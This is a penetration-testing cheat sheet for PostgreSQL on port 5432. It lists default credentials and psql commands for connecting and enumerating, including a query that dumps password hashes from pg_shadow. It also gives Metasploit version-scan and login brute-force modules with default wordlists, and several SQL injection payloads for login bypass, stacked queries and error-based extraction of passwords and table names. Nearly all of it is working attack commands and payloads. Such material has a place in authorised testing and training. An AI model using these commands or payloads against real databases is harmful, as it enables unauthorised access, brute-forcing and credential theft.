5432 - Pentesting psql
Users
user | pass |
---|---|
postgres | postgres |
postgres | password |
Connect (local)
Connect (remote)
psql -h $IP -U postgres -W postgres
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W postgres <database>
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles
# Get current user
Select user;
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+
#List databases
SELECT datname FROM pg_database;
#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;
# Get languages
SELECT lanname,lanacl FROM pg_language;
# Show installed extensions
SHOW rds.extensions;
# Get history of commands executed
\s
Enumeration
nmap
metasploit - versionuse auxiliary/scanner/postgres/postgres_version
set RHOSTS 10.0.2.5
set USERNAME hacker
unset PASSWORD
options
run
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 10.0.2.5
set BLANK_PASSWORDS true
set DATABASE template1
set STOP_ON_SUCCESS true
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt
set USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
options
run
SQL Injection
basic
x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x